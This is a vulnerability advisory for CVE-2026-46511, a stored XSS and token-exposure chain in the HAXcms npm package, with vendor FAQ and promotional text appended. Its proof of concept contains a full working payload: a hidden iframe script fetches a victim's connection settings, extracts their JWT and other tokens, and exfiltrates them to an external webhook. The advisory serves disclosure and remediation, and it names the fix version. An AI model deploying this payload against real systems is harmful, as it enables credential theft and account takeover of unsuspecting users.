Summary
An attack chain utilizing Stored XSS alongside dynamic token exposure in the /system/api/connectionSettings endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the jwt, user_token, site_token, and appstore_token) into a global JavaScript variable (window.appSettings). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.
Details
In Operations.php (connectionSettings()), the system returns a Javascript object designed to bootstrap the frontend context. This object, window.appSettings, acts as a "skeleton key" because it aggregates all necessary operational tokens for the active session.
While HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically:
- The Vector: The system is vulnerable to Stored XSS (e.g., via injected
iframesrcdocor<video-player>). - The Exposure: Because the
connectionSettingsendpoint serves the tokens locally based on the activePHPSESSIDcookie, any malicious script running in the browser context can intercept these keys. - The Chain: HAXcms isolates user environments by URL path (
/<username>/). An attacker can use XSS to force the victim's browser to fetch their target username's specific settings viafetch('/<username>/system/api/connectionSettings'). Since the browser implicitly attaches the victim's session cookie, the server authenticates the request and returns the victim's valid JWT and tokens.
PoC
1. Setup the Webhook Target
Prepare an external webhook (e.g., webhook.site) to receive the stolen data.
2. Inject the "Kill Chain" Payload
As an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an <iframe>):
<iframe srcdoc="<script>
const targetUsername = 'bto108'; // Replace with target victim
fetch(`/${targetUsername}/system/api/connectionSettings`)
.then(res => res.text())
.then(data => {
const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));
const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');
let aToken = 'N/A';
if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
aToken = s.appStore.params.appstore_token;
}
// Exfiltrate via Image Request to bypass CORS
const payload = btoa(JSON.stringify({
target: targetUsername,
jwt: s.jwt,
user_token: uToken,
site_token: sToken,
appstore_token: aToken
}));
new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
});
</script>" style="display:none"></iframe>
3. Execution & Verification
- When the victim (e.g., user
bto108) views the compromised page, their browser automatically fires thefetchrequest, silently attaching their active session cookie. - The server responds with their connection settings.
- The script parses their
jwt,user_token, and other keys, encoding them in base64. - The attacker receives the full JWT and token dump on their webhook.
Screenshots confirming the data leakage and webhook capture:
Impact
Critical Severity.
This attack completely compromises the primary defense mechanism of the CMS. By stealing the jwt and user_token, the attacker achieves total account hijacking without needing the victim's password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).
The reliance on a global Javascript variable (window.appSettings) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-46511? CVE-2026-46511 is a high-severity cross-site scripting (XSS) vulnerability in @haxtheweb/haxcms-nodejs (npm), affecting versions <= 25.0.0. It is fixed in 26.0.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
- Which versions of @haxtheweb/haxcms-nodejs are affected by CVE-2026-46511? @haxtheweb/haxcms-nodejs (npm) versions <= 25.0.0 is affected.
- Is there a fix for CVE-2026-46511? Yes. CVE-2026-46511 is fixed in 26.0.0. Upgrade to this version or later.
- Is CVE-2026-46511 exploitable, and should I be worried? Whether CVE-2026-46511 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-46511 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-46511? Upgrade
@haxtheweb/haxcms-nodejsto 26.0.0 or later.